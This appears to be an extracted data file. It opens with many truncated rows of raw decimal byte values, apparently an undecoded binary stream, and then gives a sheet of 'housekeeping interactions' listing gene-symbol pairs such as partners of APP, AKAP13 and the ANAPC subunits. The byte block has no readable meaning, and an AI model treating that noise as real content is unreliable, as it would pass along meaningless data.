	125 113 194 224 93 214 213 253 0 222 28 217 85 47 5 135 226 205 108 73 149 96 107 42 219 116 65 211 184 128 162 176 160 66 47 189 102 171 196 143 119 239 64 114 164 37 216 64 156 157 49 217 143 87 76 11 77 67 241 115 87 93 119 18 111 200 133 19 43 94 52 191 47 125 243 92 193 133 109 158 248 6 123 94 174 215 252 193 190 118 50 98 123 31 150 247 70 240 180 141 174 105 60 151 254 101 213 193 221 91 …
	235 203 42 28 162 16 221 251 63 161 179 47 87 109 221 97 127 65 28 62 246 61 177 184 26 23 86 190 32 62 35 70 131 81 161 235 135 190 39 100 188 22 175 70 85 213 120 57 174 114 86 43 53 94 244 245 216 54 199 111 43 106 28 223 90 181 104 245 7 171 231 20 90 239 183 152 47 23 13 31 65 171 31 188 250 109 131 48 97 74 222 185 76 40 49 180 15 160 110 139 217 98 254 219 186 255 99 39 249 105 39 107 206 …
	169 65 186 170 164 75 211 135 73 215 46 149 106 210 210 154 116 142 128 74 69 100 169 33 105 26 215 164 45 197 100 69 186 174 38 93 229 74 47 90 67 101 170 111 34 115 145 200 236 174 78 135 214 49 153 252 251 49 25 39 102 81 99 26 61 116 83 149 53 68 252 51 186 48 37 122 215 91 211 18 74 155 243 200 106 140 160 148 84 204 115 72 118 9 166 62 239 160 218 106 37 100 77 147 5 216 162 207 168 209 139…
	164 110 215 248 165 127 22 227 175 45 61 121 147 12 224 255 99 239 89 160 219 42 174 28 61 201 138 163 200 137 136 147 0 177 113 132 67 154 16 108 71 146 229 111 226 52 250 218 38 182 100 91 78 130 137 192 79 150 158 226 135 101 73 72 207 63 8 193 9 161 229 31 74 161 205 158 3 52 244 147 205 110 23 54 225 211 5 150 179 11 36 228 0 27 2 105 216 238 66 183 219 208 45 61 229 83 32 77 248 236 90 182 …
	72 45 229 40 35 130 123 20 240 6 77 60 5 32 236 10 155 51 93 225 210 34 252 88 168 216 11 138 169 140 153 200 213 180 23 88 201 86 114 185 86 18 115 124 126 107 222 14 7 175 189 133 196 243 201 148 134 214 31 243 119 230 145 145 125 34 253 181 139 242 246 20 82 55 93 75 42 68 57 37 162 234 73 41 37 106 3 185 68 33 138 172 129 134 90 151 251 18 190 156 182 220 138 172 166 146 199 3 12 89 154 121 1…
	20 148 246 111 16 254 6 194 129 148 76 215 28 90 89 43 122 5 189 89 153 139 231 159 127 27 50 243 110 102 154 101 101 3 229 212 101 210 55 166 169 223 62 150 144 15 213 165 51 236 47 210 228 40 58 173 176 60 191 81 193 17 27 140 7 18 220 220 78 22 72 244 9 9 71 44 58 60 186 146 37 243 73 175 189 119 56 144 232 149 96 55 150 176 64 211 112 223 166 40 31 140 133 184 47 246 179 68 3 244 166 213 42 2…
	23 18 23 8 133 100 247 6 144 221 140 144 64 35 188 114 197 180 2 33 71 225 55 17 133 199 142 254 64 34 16 20 184 68 50 177 13 123 85 38 206 59 176 87 4 146 161 242 33 40 137 196 226 72 205 168 128 171 97 127 249 172 252 124 134 135 192 222 155 239 157 1 133 167 171 45 216 153 19 92 32 20 136 68 158 223 132 121 10 163 194 55 126 142 101 9 49 33 16 73 2 83 118 199 21 110 139 219 69 112 149 99 236 1…
	39 193 93 206 61 227 23 104 111 29 87 237 116 90 156 238 122 39 49 89 29 149 53 118 183 141 84 154 77 102 123 165 221 249 67 87 205 184 211 102 27 183 91 199 11 24 203 109 206 142 46 111 115 151 141 180 27 221 173 109 46 159 159 180 183 58 186 188 62 175 155 116 27 189 110 119 171 195 197 248 53 234 118 159 183 161 202 73 218 218 150 211 157 90 70 250 61 240 91 220 198 6 99 149 201 232 237 83 61 …
	156 62 56 26 253 162 78 19 85 218 177 192 32 125 157 104 10 69 138 14 168 85 89 111 25 13 72 119 169 10 157 100 53 79 59 141 108 133 38 112 255 17 167 145 209 1 104 21 196 208 89 232 114 120 2 133 73 236 9 205 240 23 212 45 52 179 155 180 18 60 235 0 218 30 48 188 0 107 135 191 158 156 148 118 184 119 208 39 125 16 64 45 67 186 15 122 184 13 96 46 16 32 191 180 190 43 95 107 165 59 23 220 85 65 1…
	16 13 161 77 144 145 162 182 36 126 203 66 78 116 242 131 56 90 146 199 251 174 115 31 255 195 200 32 64 177 123 51 89 183 134 113 163 118 38 150 68 167 240 114 65 30 60 181 248 13 152 145 103 162 253 184 93 151 220 157 193 143 37 208 145 187 140 239 227 4 244 213 158 137 14 245 225 103 165 100 186 186 251 113 19 253 147 153 184 144 24 226 52 119 173 18 237 63 177 68 232 169 1 150 168 245 155 237…
	32 142 92 49 140 162 197 41 216 127 204 63 131 147 193 126 225 52 182 137 114 210 180 119 45 86 118 184 175 7 55 65 95 242 16 54 208 112 159 107 52 24 9 12 82 22 223 250 50 74 0 77 15 124 93 76 237 145 247 75 115 145 223 94 143 226 54 220 39 198 86 126 132 18 212 28 235 126 242 126 69 54 186 184 72 44 16 90 249 158 82 37 52 137 143 217 34 145 248 118 150 44 204 192 176 31 1 48 99 209 123 247 144 …
	163 50 167 34 215 15 241 66 195 99 108 230 200 226 125 47 162 36 243 209 164 112 220 47 139 122 134 0 4 55 190 136 200 120 151 24 89 112 88 49 192 103 161 36 70 198 154 16 169 21 239 135 230 207 68 18 19 70 155 68 165 208 205 137 235 143 217 1 6 50 59 110 146 140 30 186 172 125 192 185 86 46 121 95 48 188 183 231 202 54 14 121 255 99 161 52 47 64 55 30 184 205 243 217 247 223 124 219 104 49 153 1…
	161 250 64 172 110 0 97 2 25 158 87 70 191 218 57 66 205 151 2 204 164 135 168 165 33 14 179 238 122 152 155 214 146 26 156 25 106 15 73 61 73 246 150 7 189 140 122 50 128 10 215 86 57 219 218 114 77 150 47 49 243 200 65 146 223 156 201 163 169 115 150 52 66 46 124 93 140 61 248 242 244 171 12 151 127 114 188 241 117 233 11 127 175 79 135 231 94 115 243 201 141 207 150 255 249 254 190 140 142 92 …
	61 171 183 77 60 80 212 115 230 187 88 55 173 47 52 208 210 89 212 163 79 247 120 159 217 58 191 123 124 12 161 47 250 212 227 88 254 123 190 207 239 60 241 173 219 183 170 160 212 214 158 36 187 209 115 167 71 159 190 214 179 236 222 162 158 70 207 200 45 136 219 218 51 113 231 202 158 198 49 125 250 112 239 222 190 59 6 78 15 34 84 231 95 16 64 122 245 233 207 239 76 250 26 199 222 29 65 232 41…
	189 231 204 153 115 239 61 59 120 213 110 27 79 175 172 204 233 224 32 156 223 53 70 49 24 181 104 161 246 14 170 187 199 255 102 139 242 130 186 11 6 225 152 45 187 75 37 157 216 199 255 14 178 5 89 4 189 185 72 65 185 173 11 170 233 241 112 171 46 141 110 156 61 212 168 149 218 139 49 76 123 104 80 101 71 157 254 4 208 192 70 149 127 250 251 146 219 117 179 226 63 184 40 142 137 226 111 221 8 2…
	171 123 45 126 253 19 45 220 19 212 230 110 235 188 158 126 164 215 53 237 193 11 207 146 141 150 103 91 253 218 196 247 236 78 171 31 192 226 122 146 223 150 47 115 85 60 208 5 229 116 205 135 173 230 114 38 73 59 190 87 15 95 183 129 71 74 75 160 233 52 254 59 231 249 156 130 181 12 255 47 227 255 205 20 172 192 244 42 90 125 38 107 113 195 99 180 255 131 235 45 15 153 242 53 38 157 203 53 149 …
	74 203 79 31 160 25 148 155 253 163 238 193 198 33 15 29 159 217 223 178 233 108 221 129 214 184 138 21 245 177 163 177 245 151 246 158 238 238 108 160 249 135 235 47 94 126 161 164 98 255 246 216 209 220 154 199 26 68 197 100 247 59 245 142 1 58 179 107 176 111 112 77 205 174 157 244 249 184 123 235 5 72 255 243 237 228 52 33 134 128 12 60 80 243 128 21 64 5 208 11 188 4 248 128 119 129 147 192 …
	90 66 115 47 225 108 201 65 191 133 181 171 83 181 181 159 87 228 205 253 191 221 135 225 254 254 111 162 94 63 85 20 172 190 54 250 10 246 177 24 212 124 113 248 181 254 183 182 172 218 87 91 231 169 212 107 173 17 127 85 94 29 189 134 61 189 17 238 210 222 35 238 27 173 77 91 104 44 244 160 112 102 58 151 102 138 134 76 122 183 125 17 158 49 107 75 29 98 67 169 17 213 80 150 34 182 149 62 16 21…
	131 131 60 31 31 65 175 177 74 226 189 70 116 45 32 228 58 115 4 61 112 177 196 123 224 208 206 22 114 122 98 4 156 182 8 78 33 141 37 228 52 107 4 181 176 81 226 181 112 46 233 244 152 90 113 43 15 121 61 57 130 82 251 182 40 53 212 41 42 215 105 17 125 157 238 145 107 218 8 198 190 239 72 124 236 67 141 52 228 49 123 4 109 246 132 196 219 44 234 146 125 232 154 190 13 249 164 143 160 180 94 23 …
	168 205 219 50 31 232 163 47 142 17 170 79 248 233 153 12 88 78 20 106 169 147 132 225 73 180 137 63 77 24 186 68 251 243 143 51 174 252 191 20 63 18 51 126 96 37 110 198 236 6 60 192 240 128 67 70 234 93 63 5 68 85 174 30 241 77 226 3 64 84 223 26 111 98 116 44 237 84 192 39 1 151 2 230 155 248 225 205 155 0 183 0 214 1 238 4 220 7 120 0 240 16 224 171 128 63 4 124 199 196 143 132 184 7 136 7 16…
	195 228 144 28 113 142 120 199 104 199 35 142 177 142 36 199 120 135 205 49 201 97 82 37 53 65 29 173 38 170 227 212 71 213 41 234 116 117 185 234 84 55 169 21 234 115 106 239 87 190 167 152 198 54 178 191 5 217 83 237 83 237 22 199 24 71 162 99 156 195 234 72 118 164 56 44 32 223 82 117 163 250 190 250 225 31 45 213 63 143 234 78 56 197 142 176 111 183 77 248 51 228 65 50 182 246 135 5 249 223 5…
	226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48…
	168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 2…
	219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 2…
	234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 24…
	186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 …
	83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 …
	53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68…

## Sheet: housekeeping interactions
MRPL23	ABCC2
MRPL24	ABCC2
NFKB1	ABCC2
SLC9A3R1	ABCC2
SNTA1	ABCC4
SNX27	ABCC4
UBC	ABCC4
ABCD1	ABCD1
ABCD2	ABCD1
ITPR3	ABCD1
AGPS	ABCD3
ROBO1	ABL1
RPP38	ABL1
RYBP	ABL1
SCARF2	ABL1
SEMA7A	ABL1
SEPN1	ABL1
SF3B4	ABL1
SFN	ABL1
SNX3	ABL1
SOCS1	ABL1
SORBS1	ABL1
SOS2	ABL1
SP1	ABL1
STK4	ABL1
STON2	ABL1
UHMK1	ABL1
VAV1	ABL1
VPREB1	ABL1
VPS13A	ABL1
WASF1	ABL1
WNK2	ABL1
XRCC6	ABL1
YTHDC1	ABL1
CAV1	ABL2
ERBB2	ABL2
ERBB3	ABL2
ERBB4	ABL2
VCP	ADCK3
ADCY5	ADCY2
STOML3	ADCY3
TAT	ADCY3
UBC	ADCY3
ADCY5	ADCY5
COX3	ADCY5
GNAI1	ADCY5
GNB2	ADCY5
MYCBP2	ADCY5
RANBP9	ADCY5
SNAPIN	ADCY5
UBC	ADCY5
ATXN1	ADCY6
GNAS	ADCY6
RAF1	ADCY6
XRCC6	ADCY7
HDAC1	ADD1
SIN3A	ADD1
PTPRZ1	ADD2
ADH1A	ADH1A
CSNK2A2	ADH1A
ADH5	ADH5
VTN	ADH5
RASSF5	ADH6
RPAIN	ADH6
RSL1D1	ADH6
TNIP1	ADH6
ADH7	ADH7
CAND1	ADH7
GNAQ	ADHFE1
BAG3	ADI1
ADIPOR1	ADIPOQ
GSTK1	ADIPOQ
NAA20	ADIPOR1
NFKBIL1	ADIPOR1
GSK3B	ADIRF
RPL17	ADRBK1
RPL22	ADRBK1
RPL23	ADRBK1
RPL24	ADRBK1
RPL26	ADRBK1
RPL29	ADRBK1
RPL31	ADRBK1
RPL32	ADRBK1
RPL36A	ADRBK1
RPL37A	ADRBK1
RPL38	ADRBK1
RPS10	ADRBK1
RPS11	ADRBK1
RPS27	ADRBK1
SRC	ADRBK1
TWF1	ADSL
TYMS	ADSL
UBC	ADSL
CBX3	ADSS
CHMP4A	ADSS
HSPE1	ADSS
IDH1	ADSS
IKBKE	ADSS
OXCT1	ADSS
ATXN1L	AES
FAM203A	AES
GABARAP	AES
MED31	AES
SRC	AFAP1
TRIP6	AFAP1L1
ACD	AFAP1L2
TERF1	AFAP1L2
TERF2	AFAP1L2
TINF2	AFAP1L2
CDK9	AFF1
DOT1L	AFF1
ELL2	AFF1
MED26	AFF1
MLLT3	AFF3
AFF4	AFF4
MED26	AFF4
MLLT1	AFF4
BECN1	AFG3L2
MAPK8IP2	AFG3L2
AP1G1	AFTPH
AP1G2	AFTPH
EPB41L1	AGAP2
SNCA	AGAP2
STAT5A	AGAP2
DLG4	AGBL5
AGER	AGER
CANX	AGER
HMGB1	AGER
S100B	AGER
SEC61B	AGER
TTR	AGER
ALAD	AGFG1
SRPK1	AHCYL1
SRPK2	AHCYL1
SUGT1	AHCYL1
SUMO2	AHCYL1
TACC3	AHCYL1
UBA6	AHCYL1
UBC	AHCYL1
UBE2B	AHCYL1
UBE2C	AHCYL1
UBE2D1	AHCYL1
UBE2L3	AHCYL1
UBE4B	AHCYL1
UBL7	AHCYL1
UBQLN1	AHCYL1
ZRANB2	AHCYL1
ZYX	AHCYL1
BAP1	AHCYL2
SMYD2	AHI1
CCDC15	AHNAK
CDK1	AHNAK
CSNK1E	AHNAK
EGFR	AHNAK
ESR1	AHNAK
EZR	AHNAK
FMNL1	AHNAK
POT1	AHNAK
SUMO2	AHNAK
TPR	AHNAK
UBC	AHNAK
GADD45A	AICDA
HAUS4	AICDA
ACTA1	AIF1
LCP1	AIF1
UBC	AIF1
BAG3	AIF1L
ADRB2	AIFM1
ADRBK1	AIFM1
AIFM1	AIFM1
AMFR	AIFM1
AURKB	AIFM1
EEF2K	AIFM1
EIF3G	AIFM1
ESR1	AIFM1
FBXO6	AIFM1
KANK2	AIFM1
MCF2L	AIMP2
AHR	AIP
CDK9	AIP
CSNK2A1	AIP
EIF2S3	AIP
FPGT-TNNI3K	AIP
GNA13	AIP
HSP90AA1	AIP
ILK	AIP
LAMP1	AIP
MAX	AIP
UBD	AIPL1
AIRE	AIRE
HDAC1	AIRE
HDAC2	AIRE
HIST1H2AC	AIRE
HIST2H2BE	AIRE
HIST3H3	AIRE
HSPA4	AIRE
HSPA5	AIRE
IPO7	AIRE
KPNB1	AIRE
LMNB1	AIRE
MCM2	AIRE
MCM5	AIRE
MCM6	AIRE
NASP	AIRE
NCK1	AIRE
NOP56	AIRE
RANBP9	AIRE
RUVBL2	AIRE
SMC1A	AIRE
CDH1	AJAP1
ACTA1	AJUBA
ACVR1	AJUBA
AURKB	AJUBA
CTNNA1	AJUBA
EGLN2	AJUBA
RARA	AJUBA
ACTR6	AK2
BAG3	AK2
CUL3	AK2
DLD	AK2
DSP	AK2
EIF1B	AK2
EPB41	AK2
GH1	AK2
IDH1	AK2
IKBKE	AK2
MEPCE	AK2
MRPL12	AK2
PAK2	AK2
RAVER1	AK2
SHBG	AK2
CPNE6	AK5
NUCKS1	AK5
UGDH	AK5
YWHAZ	AK5
PRMT6	AK8
AMY1A	AKAP1
CAV1	AKAP1
PRKAR2B	AKAP1
PTPN21	AKAP1
COG3	AKAP10
DCTN4	AKAP10
MYH9	AKAP10
PRKAR1A	AKAP10
CTNNB1	AKAP12
DYNC1H1	AKAP12
DYNC1I2	AKAP12
EGFR	AKAP12
FHL1	AKAP12
PDE4D	AKAP12
BAK1	AKAP13
CTNNAL1	AKAP13
ESR1	AKAP13
ESR2	AKAP13
GNA12	AKAP13
GNAQ	AKAP13
NME1-NME2	AKAP13
PPARA	AKAP13
RANBP2	AKAP13
RHOA	AKAP13
RXRB	AKAP13
TGM2	AKAP13
THRA	AKAP13
YWHAB	AKAP13
YWHAE	AKAP13
YWHAG	AKAP13
YWHAZ	AKAP13
MYCBP	AKAP14
PRKACA	AKAP14
CSTF2	AKAP2
GRB2	AKAP2
KIAA0196	AKAP2
KIF5B	AKAP2
NCK1	AKAP2
PIH1D1	AKAP2
PIK3R1	AKAP2
GRIA1	AKAP5
PRKACA	AKAP5
UBC	AKAP5
FYN	AKAP6
OPTN	AKAP6
AURKB	AKAP8
BARD1	AKAP8
CAND1	AKAP8
CSNK2A1	AKAP8
DDX5	AKAP8
ESR1	AKAP8
HNRNPA1	AKAP8
ILK	AKAP8
IQCJ-SCHIP1	AKAP8
CSNK1E	AKAP9
FNBP1	AKAP9
PCNT	AKAP9
PKN1	AKAP9
PPP2R1B	AKAP9
PPP2R3A	AKAP9
PRKAR2A	AKAP9
PRMT2	AKR1B1
ACACA	AKR1B10
NOS2	AKR1B10
TERF2IP	AKR1B10
AKR1C1	AKR1C1
MAPK3	AKR1C1
AKR1C2	AKR1C2
ACIN1	AKR1C3
LRIF1	AKR1C3
MAGEA11	AKR1C3
RIF1	AKR1C3
UBC	AKR1C3
UBE2W	AKR1C3
ACTA1	AKT1
DNAJB1	AKT1
EP300	AKT1
GAPDH	AKT1
GSK3B	AKT1
HSPA4	AKT1
PEBP1	AKT1
PREX1	AKT1
SKI	AKT1
RPS6KA5	AKT1S1
TCEA2	AKT1S1
YWHAQ	AKT1S1
AKT1	AKT2
AKT1S1	AKT2
AKT2	AKT2
APOB	AKT2
ARRB2	AKT2
NEDD4	AKT3
PPP2CA	AKT3
TAT	AKT3
TTC3	AKT3
UBC	AKT3
HDLBP	AKTIP
HOOK1	AKTIP
HOOK3	AKTIP
IARS	AKTIP
IMMT	AKTIP
KIAA1377	AKTIP
POLA2	AKTIP
VPS18	AKTIP
CDKN1A	ALAS1
DUSP19	ALAS1
APOA4	ALB
CHKB	ALB
CROT	ALB
CRYAA	ALB
CRYAB	ALB
CST3	ALB
DCD	ALB
DERL1	ALB
DICER1	ALB
DMWD	ALB
EEF2K	ALB
F2	ALB
KRT6A	ALB
LRP2	ALB
LUC7L2	ALB
TFRC	ALB
TIAM1	ALB
TK1	ALB
TLN2	ALB
TTR	ALB
UBC	ALB
ZRANB1	ALDH18A1
ALDH1A1	ALDH2
SIRT3	ALDH2
CAND1	ALDH3A2
DYNLL1	ALDOA
ALDOA	ALDOB
LMNA	ALOX12B
TGM1	ALOX12B
PEBP1	ALOX15
ERAL1	ALOX15B
ACTB	ALOX5
TRAF3	ALPL
ALPPL2	ALPP
FAF2	ALPP
ALPPL2	ALPPL2
ALS2	ALS2
VCP	ALS2
SOX10	ALX4
COX8A	AMBP
CTSB	AMBP
DAAM1	AMBP
FN1	AMBP
GRB2	AMBP
PIK3CA	AMBP
PIK3R3	AMBP
STAT3	AMBP
CD82	AMFR
CRMP1	AMFR
CSE1L	AMFR
HSPA4	AMFR
KPNB1	AMFR
PDIA2	AMFR
STT3B	AMFR
TRIM28	AMFR
UBE2D1	AMFR
UBXN1	AMFR
AMHR2	AMH
COPS5	AMH
ETV5	AMH
AXIN1	AMMECR1
AXIN2	AMMECR1
CSNK1G1	AMMECR1
LRP6	AMMECR1
SRPK1	AMMECR1L
SRPK2	AMMECR1L
UBC	AMMECR1L
STAMBP	AMN
TXLNA	AMN
VMP1	AMN
DYNLL1	AMOT
DYNLL2	AMOT
INPPL1	AMPD2
ITSN1	AMPH
ITSN2	AMPH
KHDRBS1	AMPH
MANEA	AMPH
PPP3CB	AMPH
REPS1	AMPH
SH3GL2	AMPH
UBC	AMPH
VTN	AMPH
VWA5B2	AMPH
CDC16	ANAPC1
CDC20	ANAPC1
CDC23	ANAPC1
CDC20	ANAPC10
CDC23	ANAPC10
CDC27	ANAPC10
LIG4	ANAPC10
LRP1	ANAPC10
LRP2	ANAPC10
MDC1	ANAPC10
PPP2R1A	ANAPC10
PTTG1	ANAPC10
TP53BP1	ANAPC10
UBC	ANAPC10
UBE2D1	ANAPC10
ANAPC1	ANAPC13
ANAPC13	ANAPC13
CDC16	ANAPC13
CDC20	ANAPC13
CDC23	ANAPC13
PTTG1	ANAPC13
ANAPC1	ANAPC15
ANAPC10	ANAPC15
ANAPC2	ANAPC15
ANAPC4	ANAPC15
ANAPC7	ANAPC15
CDC16	ANAPC15
CDC20	ANAPC15
CDC26	ANAPC15
ANAPC1	ANAPC16
ANAPC16	ANAPC16
BUB1B	ANAPC16
CDC16	ANAPC16
CDC20	ANAPC16
CDC23	ANAPC16
PTTG1	ANAPC16
TP53BP1	ANAPC16
ANAPC2	ANAPC2
EP300	ANAPC2
EPHA4	ANAPC2
LYAR	ANAPC2
MAD2L1	ANAPC2
NINL	ANAPC2
PSTPIP1	ANAPC2
PTTG1	ANAPC2
ANAPC1	ANAPC4
ANAPC13	ANAPC4
ANAPC2	ANAPC4
ANAPC4	ANAPC4
BUB1B	ANAPC4
CCNA2	ANAPC4
CCNB1	ANAPC4
CDC16	ANAPC4
CDC20	ANAPC4
MAD2L1	ANAPC4
NEK2	ANAPC4
ANAPC1	ANAPC5
ANAPC13	ANAPC5
ANAPC15	ANAPC5
ANAPC2	ANAPC5
ANAPC4	ANAPC5
ANAPC7	ANAPC5
BACH1	ANAPC5
CCNB1	ANAPC5
CDC16	ANAPC5
CDC20	ANAPC5
CDT1	ANAPC5
EP300	ANAPC5
MAPK6	ANAPC5
MDC1	ANAPC5
PABPC1	ANAPC5
PAXIP1	ANAPC5
PHF8	ANAPC5
PTEN	ANAPC5
PTTG1	ANAPC5
SMURF2	ANAPC5
SOX2	ANAPC5
TP53BP1	ANAPC5
UBE2C	ANAPC5
ANAPC2	ANAPC7
ANAPC4	ANAPC7
ANAPC7	ANAPC7
BAP1	ANAPC7
CDK1	ANAPC7
CDT1	ANAPC7
COPS5	ANAPC7
VCP	ANAPC7
ACTN2	ANG
FST	ANG
ANGPT2	ANGPT1
ITGA5	ANGPT1
UBC	ANGPT1
CDKN1A	ANGPT2
CSNK2B	ANGPT2
UBC	ANGPT2
ANGPTL1	ANGPTL1
LILRB2	ANGPTL2
ITGAV	ANGPTL3
ITGB3	ANGPTL3
ITGB1	ANGPTL4
CUL3	ANK1
DNAJB5	ANK2
EPB42	ANK2
GRB2	ANK2
KCNJ11	ANK2
TP53	ANK2
UBC	ANK2
AP3B1	ANK3
CRKL	ANK3
MAPK6	ANK3
MAPRE3	ANK3
SCN2A	ANK3
SCN5A	ANK3
SCNN1B	ANK3
TIAM1	ANK3
UBC	ANK3
IQCB1	ANKAR
FAM21A	ANKFY1
VPS35	ANKFY1
ANKRD11	ANKRD11
HDAC4	ANKRD11
SRC	ANKRD11
CDK6	ANKRD12
APC	ANKRD17
BAP1	ANKRD17
ITGA4	ANKRD17
KIAA0368	ANKRD17
NFKBIE	ANKRD17
NOD2	ANKRD17
ZBTB3	ANKRD2
BCL3	ANKRD28
CD164	ANKRD28
CSNK2B	ANKRD28
AP4E1	AP4B1
BUB1	AP4B1
BUB1B	AP4B1
FIBP	AP4B1
UBC	AP4B1
AP4E1	AP4M1
CACNG3	AP4M1
CHTF8	AP4M1
GRIN2A	AP4M1
GRIN2B	AP4M1
HSPA1A	APAF1
HSPA4	APAF1
NLRP1	APAF1
USP20	APBA2
PSEN1	APBA3
APBA1	APBB1
CAMK1	APP
CAMKK2	APP
CAMKMT	APP
CAMKV	APP
CAPNS2	APP
CAPRIN1	APP
CAPSL	APP
CARS	APP
CASC4	APP
CASZ1	APP
CAV1	APP
CBFB	APP
CCDC106	APP
CCDC11	APP
CCDC115	APP
CCDC144NL	APP
CCDC147	APP
CCDC15	APP
CCDC28B	APP
CCDC59	APP
CCDC60	APP
CCDC88C	APP
CCIN	APP
CCL13	APP
CCL26	APP
CCNB1IP1	APP
CCNG1	APP
CCNL1	APP
CCSER2	APP
CCT8	APP
CCZ1	APP
CD300LF	APP
CD36	APP
CDCA3	APP
CDIPT	APP
CDK16	APP
CDK17	APP
CDK2AP2	APP
CDK3	APP
CDK4	APP
CDK5R1	APP
CDK7	APP
CDKL2	APP
CDKL3	APP
CENPI	APP
CENPQ	APP
CENPT	APP
CEP250	APP
CERK	APP
CFDP1	APP
CFHR2	APP
CHAF1B	APP
CHCHD6	APP
CHGB	APP
CHKA	APP
CHMP3	APP
CHRAC1	APP
CIAO1	APP
CIRBP	APP
CIRH1A	APP
CISD2	APP
CMTM3	APP
CNPY2	APP
CNTN3	APP
COMMD2	APP
COPB1	APP
COPS5	APP
COPS7B	APP
COPZ1	APP
COX4I1	APP
COX4I2	APP
COX6A2	APP
CPLX2	APP
CRADD	APP
CSRP1	APP
CST2	APP
CSTF2	APP
CTNNA1	APP
CTNNB1	APP
CXCL14	APP
CXCL16	APP
ITM2B	APP
JAGN1	APP
JTB	APP
KCNAB3	APP
KCNE1L	APP
KCNJ10	APP
KCNK5	APP
KCNMB2	APP
KCNN3	APP
KCTD18	APP
KIAA0513	APP
KIAA1143	APP
KIF2C	APP
KIF3A	APP
KLF6	APP
KLF7	APP
KLHL32	APP
KLK6	APP
KRT36	APP
LPAR3	APP
LPL	APP
LRRC8D	APP
MKKS	APP
RAB5C	APP
RAB7B	APP
RAB8B	APP
RABL3	APP
RAD51AP1	APP
SPATA2	APP
SPATA4	APP
SPATS2	APP
SRRM2	APP
SRSF3	APP
SRSF6	APP
SRSF8	APP
SRSF9	APP
SSB	APP
SSH3	APP
SSTR2	APP
ST3GAL6	APP
STAC	APP
STARD10	APP
STAT5B	APP
STIP1	APP
STK17B	APP
STK33	APP
SUMO1	APP
SYK	APP
TAGLN2	APP
TAP2	APP
TARDBP	APP
TASP1	APP
TBC1D10C	APP
TBC1D20	APP
TCEANC2	APP
TCP11L2	APP
THAP4	APP
THAP7	APP
TICRR	APP
TMA7	APP
TMEM53	APP
TMX3	APP
TOM1L2	APP
TOMM40	APP
TOP1	APP
TP53TG5	APP
TRAIP	APP
TRAPPC4	APP
TRIB2	APP
TRIB3	APP
TRIM16	APP
TRIM39	APP
TRIM44	APP
TRIM47	APP
TRIM63	APP
TTC23	APP
UBE2E2	APP
UBE3A	APP
UBE3C	APP
UBL3	APP
UBL4A	APP
UBQLN1	APP
UBXN10	APP
UBXN6	APP
UBXN7	APP
ULK4	APP
UNG	APP
UPF3A	APP
UTP23	APP
VAC14	APP
VAMP3	APP
VAT1L	APP
VPS33B	APP
WASL	APP
WDR45B	APP
WDR5	APP
WDR88	APP
WDR89	APP
WHSC1	APP
YWHAZ	APP
ZC3HAV1L	APP
ZC3HC1	APP
ZCCHC17	APP
ZCCHC8	APP
ZNF22	APP
ZNF23	APP
ZNF322	APP
ZNF574	APP
ZNF581	APP
ZNF740	APP
ZRSR2	APP
AR	APPBP2
CHMP5	APPBP2
CNTFR	APPBP2
COPS6	APPBP2
CUL2	APPBP2
EID3	APPBP2
FAM92A1	APPBP2
FSTL1	APPBP2
GP9	APPBP2
KIF6	APPBP2
MFSD3	APPBP2
SLC22A6	APPBP2
SYT11	APPBP2
TBL3	APPBP2
TCEB1	APPBP2
UBC	APPBP2
WDR24	APPBP2
ITGA4	APRT
UMPS	APRT
VHL	APRT
BANF1	APTX
MAPK3	AQP2
NEDD4	AQP9
EIF4A3	AQR
HNRNPA1	AQR
MAGOH	AQR
RBM22	AQR
SIRT7	AQR
WDR77	AQR
ZNF830	AQR
NCOA1	AR
NCOA2	AR
